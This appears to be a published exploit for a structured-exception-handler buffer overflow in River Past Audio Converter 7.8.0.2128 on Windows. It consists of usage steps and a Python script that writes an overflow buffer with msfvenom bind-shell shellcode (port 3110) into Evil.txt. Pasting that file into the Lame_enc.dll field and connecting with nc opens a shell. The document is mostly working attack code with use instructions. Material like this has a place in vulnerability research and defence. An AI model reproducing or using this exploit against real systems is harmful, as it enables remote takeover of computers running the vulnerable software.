# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
# Date: 27.12.2025
# Software Link :https://river-past-audio-converter.software.informer.com/download/?caef29
# Exploit Author: Achilles
# Tested Version: 7.8.0.2128
# Tested on: Windows 11 64bit
# 1.- Run python code : River_Past_Audio_Converter.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open River_PastAudio_Converter.exe and click on the 'Options' inside fhe 'File' menu
# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 280
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x100119e7) #pop ebx # pop ebp # ret rvebscut.dll
nops = "\x90" * 20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x2f" -i 1 -f python
shellcode = ("\xd9\xcf\xbb\x33\xdd\xa3\xbb\xd9\x74\x24\xf4\x58"
"\x2b\xc9\xb1\x53\x31\x58\x17\x03\x58\x17\x83\xdb"
"\x21\x41\x4e\xe7\x32\x04\xb1\x17\xc3\x69\x3b\xf2"
"\xf2\xa9\x5f\x77\xa4\x19\x2b\xd5\x49\xd1\x79\xcd"
"\xda\x97\x55\xe2\x6b\x1d\x80\xcd\x6c\x0e\xf0\x4c"
"\xef\x4d\x25\xae\xce\x9d\x38\xaf\x17\xc3\xb1\xfd"
"\xc0\x8f\x64\x11\x64\xc5\xb4\x9a\x36\xcb\xbc\x7f"
"\x8e\xea\xed\x2e\x84\xb4\x2d\xd1\x49\xcd\x67\xc9"
"\x8e\xe8\x3e\x62\x64\x86\xc0\xa2\xb4\x67\x6e\x8b"
"\x78\x9a\x6e\xcc\xbf\x45\x05\x24\xbc\xf8\x1e\xf3"
"\xbe\x26\xaa\xe7\x19\xac\x0c\xc3\x98\x61\xca\x80"
"\x97\xce\x98\xce\xbb\xd1\x4d\x65\xc7\x5a\x70\xa9"
"\x41\x18\x57\x6d\x09\xfa\xf6\x34\xf7\xad\x07\x26"
"\x58\x11\xa2\x2d\x75\x46\xdf\x6c\x12\xab\xd2\x8e"
"\xe2\xa3\x65\xfd\xd0\x6c\xde\x69\x59\xe4\xf8\x6e"
"\x9e\xdf\xbd\xe0\x61\xe0\xbd\x29\xa6\xb4\xed\x41"
"\x0f\xb5\x65\x91\xb0\x60\x13\x99\x17\xdb\x06\x64"
"\xe7\x8b\x86\xc6\x80\xc1\x08\x39\xb0\xe9\xc2\x52"
"\x59\x14\xed\x50\xbc\x91\x0b\x02\xd0\xf7\x84\xba"
"\x12\x2c\x1d\x5d\x6c\x06\x35\xc9\x25\x40\x82\xf6"
"\xb5\x46\xa4\x60\x3e\x85\x70\x91\x41\x80\xd0\xc6"
"\xd6\x5e\xb1\xa5\x47\x5e\x98\x5d\xeb\xcd\x47\x9d"
"\x62\xee\xdf\xca\x23\xc0\x29\x9e\xd9\x7b\x80\xbc"
"\x23\x1d\xeb\x04\xf8\xde\xf2\x85\x8d\x5b\xd1\x95"
"\x4b\x63\x5d\xc1\x03\x32\x0b\xbf\xe5\xec\xfd\x69"
"\xbc\x43\x54\xfd\x39\xa8\x67\x7b\x46\xe5\x11\x63"
"\xf7\x50\x64\x9c\x38\x35\x60\xe5\x24\xa5\x8f\x3c"
"\xed\xd5\xc5\x1c\x44\x7e\x80\xf5\xd4\xe3\x33\x20"
"\x1a\x1a\xb0\xc0\xe3\xd9\xa8\xa1\xe6\xa6\x6e\x5a"
"\x9b\xb7\x1a\x5c\x08\xb7\x0e")
payload = buffer + nseh + seh + nops + shellcode
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"